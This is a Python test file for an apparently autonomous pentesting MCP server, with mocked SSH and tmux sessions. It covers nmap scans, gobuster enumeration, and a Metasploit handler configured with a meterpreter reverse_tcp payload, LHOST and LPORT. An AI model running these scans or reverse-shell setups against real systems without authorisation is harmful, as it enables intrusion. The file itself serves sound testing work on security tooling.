#!/usr/bin/env python3
"""
End-to-end pentesting workflow tests.
Tests complete autonomous pentest scenarios.
These tests validate the entire system working together:
- Session management
- Command execution
- Trigger system
- Output parsing
- Error handling
"""
import pytest
import pytest_asyncio
import asyncio
import time
from unittest.mock import Mock, AsyncMock, patch
from pentest_mcp_server import PentestMCPServer
from pentest_mcp_server.ssh_manager import SSHManager
from pentest_mcp_server.tmux_manager import TmuxManager
@pytest.mark.asyncio
@pytest.mark.integration
class TestNetworkReconWorkflow:
    """Test complete network reconnaissance workflow."""

    @pytest_asyncio.fixture
    async def mock_server(self):
        """Build a PentestMCPServer whose SSH/Tmux managers are spec'd mocks."""
        server = PentestMCPServer()

        # Swap the real managers for mocks so no SSH/tmux is touched.
        server.ssh_manager = Mock(spec=SSHManager)
        server.tmux_manager = Mock(spec=TmuxManager)

        # SSH layer: always reports connected.
        server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
        server.ssh_manager.run_command = AsyncMock()

        # Tmux layer: canned happy-path responses.
        server.tmux_manager.create_session = AsyncMock(
            return_value={"status": "created", "session_id": "test_session"}
        )
        server.tmux_manager.execute_command = AsyncMock(return_value={"status": "sent"})
        server.tmux_manager.capture_pane = AsyncMock()
        server.tmux_manager.kill_session = AsyncMock(return_value={"status": "killed"})
        return server

    async def test_basic_nmap_scan_workflow(self, mock_server):
        """
        Test basic nmap scanning workflow:
        1. Create session
        2. Run nmap scan
        3. Wait for completion
        4. Read results
        5. Cleanup
        """
        # Phase 1: Create session
        created = await mock_server._handle_create_session({"session_id": "nmap_scan"})
        assert created["status"] == "created"

        # Phase 2: Execute nmap scan, with the pane output growing line by
        # line on each capture to mimic a live scan.
        scan_outputs = [
            "Starting Nmap 7.94...",
            "Nmap scan report for 127.0.0.1",
            "Host is up (0.00010s latency).",
            "PORT STATE SERVICE VERSION",
            "22/tcp open ssh OpenSSH 8.9",
            "80/tcp open http Apache 2.4.52",
            "Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds",
            "root@kali:~# ",
        ]
        revealed = [0]  # mutable counter shared with the closure below

        def progressive_capture(*args, **kwargs):
            # Reveal one more line per capture until the scan is "done".
            if revealed[0] < len(scan_outputs):
                revealed[0] += 1
            return {
                "status": "success",
                "output": "\n".join(scan_outputs[: revealed[0]]),
            }

        mock_server.tmux_manager.capture_pane.side_effect = progressive_capture

        # Execute with a completion trigger; the trigger system itself is
        # patched to report an immediate match on the final output.
        with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
            MockTrigger.return_value.monitor_session_with_triggers = AsyncMock(
                return_value={
                    "status": "trigger_matched",
                    "trigger": {
                        "trigger_name": "scan_complete",
                        "trigger_type": "regex",
                    },
                    "output": "\n".join(scan_outputs),
                    "execution_time": 2.5,
                }
            )
            scan_result = await mock_server._handle_execute({
                "session_id": "nmap_scan",
                "command": "nmap -sV 127.0.0.1",
                "triggers": [
                    {"type": "regex", "pattern": "Nmap done", "name": "scan_complete"}
                ],
                "max_timeout": 60,
            })
            assert scan_result["status"] == "trigger_matched"
            assert "Nmap done" in scan_result["output"]
            assert "22/tcp" in scan_result["output"]

        # Phase 3: Cleanup
        cleaned = await mock_server._handle_kill_session({"session_id": "nmap_scan"})
        assert cleaned["status"] == "killed"
        print("✓ Basic nmap scan workflow completed successfully")

    async def test_parallel_scanning_workflow(self, mock_server):
        """
        Test running multiple scans in parallel:
        1. Create multiple sessions
        2. Start scans in background
        3. Monitor all sessions
        4. Collect results
        """
        sessions = ["scan1", "scan2", "scan3"]

        # One tmux session per scan target.
        for sid in sessions:
            created = await mock_server._handle_create_session({"session_id": sid})
            assert created["status"] == "created"

        # Kick off each scan in the background.
        commands = [
            "nmap -p 22 192.168.1.1",
            "nmap -p 80 192.168.1.2",
            "nmap -p 443 192.168.1.3",
        ]
        for sid, cmd in zip(sessions, commands):
            launched = await mock_server._handle_execute({
                "session_id": sid,
                "command": cmd,
                "background": True,
            })
            assert launched["status"] == "background"

        # All three sessions should be reported as active.
        mock_server.tmux_manager.list_sessions = AsyncMock(return_value=[
            {"session_id": sid, "status": "active"} for sid in sessions
        ])
        listing = await mock_server._handle_list_sessions({})
        assert len(listing["sessions"]) == 3
        print("✓ Parallel scanning workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestWebApplicationWorkflow:
    """Test web application penetration testing workflow."""

    @pytest_asyncio.fixture
    async def mock_server(self):
        """Build a PentestMCPServer with mocked SSH/Tmux managers."""
        server = PentestMCPServer()
        server.ssh_manager = Mock(spec=SSHManager)
        server.tmux_manager = Mock(spec=TmuxManager)
        server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
        server.tmux_manager.create_session = AsyncMock(
            return_value={"status": "created", "session_id": "web_test"}
        )
        server.tmux_manager.execute_command = AsyncMock(return_value={"status": "sent"})
        server.tmux_manager.capture_pane = AsyncMock()
        server.tmux_manager.kill_session = AsyncMock(return_value={"status": "killed"})
        return server

    async def test_directory_enumeration_workflow(self, mock_server):
        """
        Test directory enumeration with gobuster:
        1. Create session
        2. Run gobuster
        3. Wait for completion
        4. Parse results
        """
        created = await mock_server._handle_create_session({"session_id": "gobuster"})
        assert created["status"] == "created"

        # Canned gobuster run, including a few interesting findings.
        gobuster_output = """
===============================================================
Gobuster v3.6
===============================================================
[+] Url: http://192.168.1.100
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
===============================================================
/admin (Status: 200) [Size: 1234]
/login (Status: 200) [Size: 2345]
/uploads (Status: 301) [Size: 0]
/backup.zip (Status: 200) [Size: 5678]
===============================================================
Finished
===============================================================
root@kali:~#
"""
        mock_server.tmux_manager.capture_pane.return_value = {
            "status": "success",
            "output": gobuster_output,
        }

        # Run gobuster with a prompt trigger; the trigger system is patched
        # to report completion immediately with the canned output.
        with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
            MockTrigger.return_value.monitor_session_with_triggers = AsyncMock(
                return_value={
                    "status": "trigger_matched",
                    "trigger": {"trigger_name": "prompt_detected"},
                    "output": gobuster_output,
                    "execution_time": 15.3,
                }
            )
            outcome = await mock_server._handle_execute({
                "session_id": "gobuster",
                "command": "gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt",
                "triggers": [{"type": "prompt"}],
            })
            assert outcome["status"] == "trigger_matched"
            assert "/admin" in outcome["output"]
            assert "/uploads" in outcome["output"]
        print("✓ Directory enumeration workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestExploitationWorkflow:
    """Test exploitation workflow with Metasploit."""

    @pytest_asyncio.fixture
    async def mock_server(self):
        """Build a PentestMCPServer with mocked managers, including
        ``send_input`` for interactive tools."""
        server = PentestMCPServer()
        server.ssh_manager = Mock(spec=SSHManager)
        server.tmux_manager = Mock(spec=TmuxManager)
        server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
        server.tmux_manager.create_session = AsyncMock(
            return_value={"status": "created", "session_id": "msf"}
        )
        server.tmux_manager.execute_command = AsyncMock(return_value={"status": "sent"})
        server.tmux_manager.capture_pane = AsyncMock()
        server.tmux_manager.send_input = AsyncMock(return_value={"status": "sent"})
        server.tmux_manager.kill_session = AsyncMock(return_value={"status": "killed"})
        return server

    async def test_metasploit_interactive_workflow(self, mock_server):
        """
        Test interactive Metasploit workflow:
        1. Start msfconsole
        2. Configure exploit
        3. Set payload
        4. Execute exploit
        5. Interact with session
        """
        created = await mock_server._handle_create_session({"session_id": "msf"})
        assert created["status"] == "created"

        # Canned msfconsole banner ending at the msf6 prompt.
        msf_startup = """
=[ metasploit v6.3.25-dev ]
+ -- --=[ 2345 exploits - 1234 auxiliary - 456 post ]
+ -- --=[ 1234 payloads - 56 encoders - 12 nops ]
msf6 >
"""
        mock_server.tmux_manager.capture_pane.return_value = {
            "status": "success",
            "output": msf_startup,
        }

        # Launch msfconsole and wait (via patched trigger) for the prompt.
        with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
            MockTrigger.return_value.monitor_session_with_triggers = AsyncMock(
                return_value={
                    "status": "trigger_matched",
                    "trigger": {"trigger_name": "msf_ready", "trigger_type": "regex"},
                    "output": msf_startup,
                    "execution_time": 5.2,
                }
            )
            started = await mock_server._handle_execute({
                "session_id": "msf",
                "command": "msfconsole -q",
                "triggers": [{"type": "regex", "pattern": "msf6 >", "name": "msf_ready"}],
                "max_timeout": 30,
            })
            assert started["status"] == "trigger_matched"
            assert "msf6 >" in started["output"]

        # Drive the console interactively: configure the handler + payload.
        for cmd in (
            "use exploit/multi/handler",
            "set PAYLOAD linux/x64/meterpreter/reverse_tcp",
            "set LHOST 192.168.1.10",
            "set LPORT 4444",
        ):
            sent = await mock_server._handle_send_input({
                "session_id": "msf",
                "input": cmd,
                "press_enter": True,
            })
            assert sent["status"] == "sent"
        print("✓ Metasploit interactive workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestErrorRecoveryWorkflow:
    """Test error handling and recovery scenarios."""

    @pytest_asyncio.fixture
    async def mock_server(self):
        """Create a mock MCP server for testing.

        The manager mocks are deliberately left unconfigured so each test
        installs exactly the failure behavior it wants to exercise.
        """
        server = PentestMCPServer()
        server.ssh_manager = Mock(spec=SSHManager)
        server.tmux_manager = Mock(spec=TmuxManager)
        return server

    async def test_connection_loss_recovery(self, mock_server):
        """
        Test recovery from connection loss:
        1. Create session
        2. Simulate connection loss
        3. Auto-reconnect
        4. Recover session
        5. Continue operation
        """
        # Initial connection succeeds and a session is created normally.
        mock_server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
        mock_server.tmux_manager.create_session = AsyncMock(return_value={
            "status": "created",
            "session_id": "recovery_test"
        })
        create_result = await mock_server._handle_create_session({
            "session_id": "recovery_test"
        })
        assert create_result["status"] == "created"

        # Simulate connection loss: fail twice, then succeed.
        connection_attempts = [False, False, True]
        attempt_index = [0]  # mutable cell shared with the closure

        def mock_reconnect(*args, **kwargs):
            result = connection_attempts[attempt_index[0]]
            # Clamp at the last entry so any extra calls keep returning True.
            if attempt_index[0] < len(connection_attempts) - 1:
                attempt_index[0] += 1
            return result

        mock_server.ssh_manager.ensure_connected = AsyncMock(side_effect=mock_reconnect)

        # Retry until the (mocked) connection comes back.
        connected = False  # defensive default in case the loop never binds it
        for _ in range(3):
            connected = await mock_server.ssh_manager.ensure_connected()
            if connected:
                break
        assert connected is True  # fixed: identity check instead of `== True` (E712)

        # Recover the surviving tmux sessions after reconnecting.
        mock_server.tmux_manager.recover_sessions = AsyncMock(return_value=[
            "recovery_test"
        ])
        mock_server.tmux_manager.get_session_info = Mock(
            return_value=Mock(created_at=time.time() - 100)
        )
        mock_server.tmux_manager.capture_pane = AsyncMock(return_value={
            "status": "success",
            "output": "test output"
        })
        recovery_result = await mock_server._handle_recover_sessions({})
        assert recovery_result["status"] == "success"
        assert len(recovery_result["recovered_sessions"]) > 0
        print("✓ Connection loss recovery workflow completed successfully")

    async def test_command_error_detection(self, mock_server):
        """
        Test automatic error detection in command output:
        1. Execute command that fails
        2. Detect error automatically
        3. Provide helpful suggestion
        """
        mock_server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
        mock_server.tmux_manager.create_session = AsyncMock(return_value={
            "status": "created",
            "session_id": "error_test"
        })
        mock_server.tmux_manager.execute_command = AsyncMock(return_value={
            "status": "sent"
        })
        await mock_server._handle_create_session({"session_id": "error_test"})

        # Pane output for a command that does not exist.
        error_output = """
root@kali:~# nonexistent_command
bash: nonexistent_command: command not found
root@kali:~#
"""
        mock_server.tmux_manager.capture_pane = AsyncMock(return_value={
            "status": "success",
            "output": error_output
        })

        # The patched trigger system reports both the prompt match and the
        # detected error with a remediation suggestion.
        with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
            MockTrigger.return_value.monitor_session_with_triggers = AsyncMock(
                return_value={
                    "status": "trigger_matched",
                    "trigger": {"trigger_name": "prompt_detected"},
                    "output": error_output,
                    "execution_time": 0.5,
                    "error_detected": {
                        "error_detected": True,
                        "error_pattern": "command not found",
                        "suggestion": "Tool may not be installed. Try: apt install <tool>"
                    }
                }
            )
            result = await mock_server._handle_execute({
                "session_id": "error_test",
                "command": "nonexistent_command",
                "triggers": [{"type": "prompt"}]
            })
            assert result["status"] == "trigger_matched"
            assert "command not found" in result["output"]
        print("✓ Command error detection workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestSystemMonitoringWorkflow:
    """Test system monitoring and resource management."""

    @pytest_asyncio.fixture
    async def mock_server(self):
        """Create a mock MCP server for testing; managers are bare mocks
        configured per-test."""
        server = PentestMCPServer()
        server.ssh_manager = Mock(spec=SSHManager)
        server.tmux_manager = Mock(spec=TmuxManager)
        return server

    async def test_system_status_monitoring(self, mock_server):
        """
        Test system status monitoring:
        1. Get system information
        2. Check resource usage
        3. Monitor active sessions
        """
        # Canned host facts as the SSH layer would report them.
        mock_server.ssh_manager.get_system_info = AsyncMock(return_value={
            "hostname": "kali-pentest",
            "uptime": "up 2 days, 3:45",
            "kernel": "5.18.0-kali5-amd64",
            "cpu_info": "4",
            "memory": "45.2,4096,8192",
            "disk": "35% 28G 80G"
        })
        mock_server.ssh_manager.get_connection_status = Mock(return_value={
            "connected": True,
            "host": "192.168.1.100",
            "port": 22,
            "user": "root"
        })
        mock_server.tmux_manager.list_sessions = AsyncMock(return_value=[
            {"session_id": "scan1", "status": "active"},
            {"session_id": "scan2", "status": "active"}
        ])

        # The status handler should aggregate all three sources.
        status_result = await mock_server._handle_get_system_status({})
        assert status_result["status"] == "success"
        assert status_result["active_sessions"] == 2
        # fixed: identity check instead of `== True` (E712)
        assert status_result["connection_status"]["connected"] is True
        assert "hostname" in status_result["system_info"]
        print("✓ System status monitoring workflow completed successfully")
async def run_all_workflow_tests():
    """Drive every workflow test by hand, outside of pytest collection.

    NOTE(review): ``mock_server`` is declared with ``pytest_asyncio.fixture``;
    recent pytest versions raise "Fixtures are not meant to be called
    directly" when a fixture function is invoked like this — confirm this
    manual runner still works with the pinned pytest/pytest-asyncio versions.
    """
    banner = "=" * 60
    divider = "-" * 60

    print("\n" + banner)
    print("Running Full Workflow Tests")
    print(banner + "\n")

    # Network reconnaissance workflows.
    print("📡 Network Reconnaissance Workflow Tests")
    print(divider)
    recon = TestNetworkReconWorkflow()
    server = await recon.mock_server()
    await recon.test_basic_nmap_scan_workflow(server)
    await recon.test_parallel_scanning_workflow(server)

    # Web application workflows.
    print("\n🌐 Web Application Workflow Tests")
    print(divider)
    web = TestWebApplicationWorkflow()
    server = await web.mock_server()
    await web.test_directory_enumeration_workflow(server)

    # Exploitation workflows.
    print("\n💥 Exploitation Workflow Tests")
    print(divider)
    exploit = TestExploitationWorkflow()
    server = await exploit.mock_server()
    await exploit.test_metasploit_interactive_workflow(server)

    # Error recovery workflows.
    print("\n🔧 Error Recovery Workflow Tests")
    print(divider)
    recovery = TestErrorRecoveryWorkflow()
    server = await recovery.mock_server()
    await recovery.test_connection_loss_recovery(server)
    await recovery.test_command_error_detection(server)

    # System monitoring workflows.
    print("\n📊 System Monitoring Workflow Tests")
    print(divider)
    monitoring = TestSystemMonitoringWorkflow()
    server = await monitoring.mock_server()
    await monitoring.test_system_status_monitoring(server)

    print("\n" + banner)
    print("✅ All Workflow Tests Completed Successfully!")
    print(banner + "\n")
if __name__ == "__main__":
    # Allow running the whole workflow suite directly: `python <this file>`.
    asyncio.run(run_all_workflow_tests())